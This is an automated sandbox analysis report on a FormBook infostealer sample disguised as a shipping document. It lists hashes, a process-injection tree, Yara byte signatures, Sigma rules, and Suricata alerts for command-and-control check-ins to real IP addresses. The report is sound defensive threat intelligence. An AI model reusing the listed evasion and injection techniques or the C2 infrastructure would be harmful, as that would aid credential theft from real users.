Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z4Shipping_document_pdf.exe

Overview

General Information

Sample name:z4Shipping_document_pdf.exe
Analysis ID:1522882
MD5:aeb5e672510e739f463553e45d7f7283
SHA1:07ec11b8ab945f5560dae2f458a63a91a3653ad3
SHA256:1a685b6a7199bf38e27672e7d65a403b8809fd83fb272e47cb26054a74d2dbe9
Tags:exeFormbookuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z4Shipping_document_pdf.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe" MD5: AEB5E672510E739F463553E45D7F7283)
    • svchost.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fWXPcgRbOhi.exe (PID: 4068 cmdline: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 5356 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • fWXPcgRbOhi.exe (PID: 4508 cmdline: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6848 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x67c4e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x4fddd:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bc30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f1d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17362:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious RASdial Activity
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe" , ParentImage: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe, ParentProcessId: 4068, ParentProcessName: fWXPcgRbOhi.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 5356, ProcessName: rasdial.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ParentImage: C:\Users\user\Desktop\z4Shipping_document_pdf.exe, ParentProcessId: 5644, ParentProcessName: z4Shipping_document_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ProcessId: 2848, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ParentImage: C:\Users\user\Desktop\z4Shipping_document_pdf.exe, ParentProcessId: 5644, ParentProcessName: z4Shipping_document_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\z4Shipping_document_pdf.exe", ProcessId: 2848, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T19:57:38.042145+020020181411A Network Trojan was detected18.141.10.10780192.168.2.549720TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T19:56:59.678961+020028554651A Network Trojan was detected192.168.2.54971254.67.87.11080TCP
            2024-09-30T19:57:23.296669+020028554651A Network Trojan was detected192.168.2.549716195.161.68.880TCP
            2024-09-30T19:57:38.033225+020028554651A Network Trojan was detected192.168.2.54972018.141.10.10780TCP
            2024-09-30T19:57:52.647870+020028554651A Network Trojan was detected192.168.2.549724197.189.237.18680TCP
            2024-09-30T19:58:08.840099+020028554651A Network Trojan was detected192.168.2.549728203.175.9.12880TCP
            2024-09-30T19:58:22.257209+020028554651A Network Trojan was detected192.168.2.549732162.0.238.24680TCP
            2024-09-30T19:58:35.790023+020028554651A Network Trojan was detected192.168.2.54973631.31.196.1780TCP
            2024-09-30T19:58:49.264413+020028554651A Network Trojan was detected192.168.2.54974052.223.13.4180TCP
            2024-09-30T19:59:02.420341+020028554651A Network Trojan was detected192.168.2.549744188.114.96.380TCP
            2024-09-30T19:59:16.060399+020028554651A Network Trojan was detected192.168.2.549748206.119.82.14780TCP
            2024-09-30T19:59:30.352231+020028554651A Network Trojan was detected192.168.2.54975246.17.172.4980TCP
            2024-09-30T19:59:43.857945+020028554651A Network Trojan was detected192.168.2.5497563.33.130.19080TCP
            2024-09-30T19:59:57.106812+020028554651A Network Trojan was detected192.168.2.549760144.34.186.8580TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T19:57:15.567301+020028554641A Network Trojan was detected192.168.2.549713195.161.68.880TCP
            2024-09-30T19:57:18.204526+020028554641A Network Trojan was detected192.168.2.549714195.161.68.880TCP
            2024-09-30T19:57:20.890904+020028554641A Network Trojan was detected192.168.2.549715195.161.68.880TCP
            2024-09-30T19:57:30.046246+020028554641A Network Trojan was detected192.168.2.54971718.141.10.10780TCP
            2024-09-30T19:57:32.812279+020028554641A Network Trojan was detected192.168.2.54971818.141.10.10780TCP
            2024-09-30T19:57:35.668161+020028554641A Network Trojan was detected192.168.2.54971918.141.10.10780TCP
            2024-09-30T19:57:44.965155+020028554641A Network Trojan was detected192.168.2.549721197.189.237.18680TCP
            2024-09-30T19:57:47.511999+020028554641A Network Trojan was detected192.168.2.549722197.189.237.18680TCP
            2024-09-30T19:57:50.059160+020028554641A Network Trojan was detected192.168.2.549723197.189.237.18680TCP
            2024-09-30T19:58:01.229295+020028554641A Network Trojan was detected192.168.2.549725203.175.9.12880TCP
            2024-09-30T19:58:03.824658+020028554641A Network Trojan was detected192.168.2.549726203.175.9.12880TCP
            2024-09-30T19:58:06.299872+020028554641A Network Trojan was detected192.168.2.549727203.175.9.12880TCP
            2024-09-30T19:58:14.598245+020028554641A Network Trojan was detected192.168.2.549729162.0.238.24680TCP
            2024-09-30T19:58:17.157457+020028554641A Network Trojan was detected192.168.2.549730162.0.238.24680TCP
            2024-09-30T19:58:19.707879+020028554641A Network Trojan was detected192.168.2.549731162.0.238.24680TCP
            2024-09-30T19:58:28.107637+020028554641A Network Trojan was detected192.168.2.54973331.31.196.1780TCP
            2024-09-30T19:58:30.695961+020028554641A Network Trojan was detected192.168.2.54973431.31.196.1780TCP
            2024-09-30T19:58:33.215000+020028554641A Network Trojan was detected192.168.2.54973531.31.196.1780TCP
            2024-09-30T19:58:41.825941+020028554641A Network Trojan was detected192.168.2.54973752.223.13.4180TCP
            2024-09-30T19:58:44.220847+020028554641A Network Trojan was detected192.168.2.54973852.223.13.4180TCP
            2024-09-30T19:58:46.816695+020028554641A Network Trojan was detected192.168.2.54973952.223.13.4180TCP
            2024-09-30T19:58:54.789242+020028554641A Network Trojan was detected192.168.2.549741188.114.96.380TCP
            2024-09-30T19:58:57.350011+020028554641A Network Trojan was detected192.168.2.549742188.114.96.380TCP
            2024-09-30T19:58:59.906012+020028554641A Network Trojan was detected192.168.2.549743188.114.96.380TCP
            2024-09-30T19:59:08.371769+020028554641A Network Trojan was detected192.168.2.549745206.119.82.14780TCP
            2024-09-30T19:59:10.895681+020028554641A Network Trojan was detected192.168.2.549746206.119.82.14780TCP
            2024-09-30T19:59:13.747761+020028554641A Network Trojan was detected192.168.2.549747206.119.82.14780TCP
            2024-09-30T19:59:23.008354+020028554641A Network Trojan was detected192.168.2.54974946.17.172.4980TCP
            2024-09-30T19:59:25.283608+020028554641A Network Trojan was detected192.168.2.54975046.17.172.4980TCP
            2024-09-30T19:59:27.968098+020028554641A Network Trojan was detected192.168.2.54975146.17.172.4980TCP
            2024-09-30T19:59:36.955960+020028554641A Network Trojan was detected192.168.2.5497533.33.130.19080TCP
            2024-09-30T19:59:38.529681+020028554641A Network Trojan was detected192.168.2.5497543.33.130.19080TCP
            2024-09-30T19:59:42.136872+020028554641A Network Trojan was detected192.168.2.5497553.33.130.19080TCP
            2024-09-30T19:59:49.473446+020028554641A Network Trojan was detected192.168.2.549757144.34.186.8580TCP
            2024-09-30T19:59:52.046037+020028554641A Network Trojan was detected192.168.2.549758144.34.186.8580TCP
            2024-09-30T19:59:54.594100+020028554641A Network Trojan was detected192.168.2.549759144.34.186.8580TCP
            2024-09-30T20:00:03.141019+020028554641A Network Trojan was detected192.168.2.549761136.143.186.1280TCP
            2024-09-30T20:00:05.664801+020028554641A Network Trojan was detected192.168.2.549762136.143.186.1280TCP
            2024-09-30T20:00:08.221746+020028554641A Network Trojan was detected192.168.2.549763136.143.186.1280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: z4Shipping_document_pdf.exeReversingLabs: Detection: 31%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: z4Shipping_document_pdf.exeJoe Sandbox ML: detected
            Source: z4Shipping_document_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fWXPcgRbOhi.exe, 00000004.00000002.4550106724.000000000074E000.00000002.00000001.01000000.00000005.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599591367.000000000074E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281C1E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0281C1E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax5_2_02809B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi5_2_0280DD4C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h5_2_045E04E6
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4x nop then xor eax, eax7_2_04ED5B7E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 18.141.10.107:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49720 -> 18.141.10.107:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49761 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49732 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 18.141.10.107:80
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49720
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49712 -> 54.67.87.110:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49724 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49736 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 18.141.10.107:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49754 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 197.189.237.186:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49760 -> 144.34.186.85:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49728 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49763 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 203.175.9.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49752 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49759 -> 144.34.186.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49756 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49753 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49744 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49716 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 162.0.238.246:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49748 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49762 -> 136.143.186.12:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49750 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49757 -> 144.34.186.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49758 -> 144.34.186.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 46.17.172.49:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 31.31.196.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 206.119.82.147:80
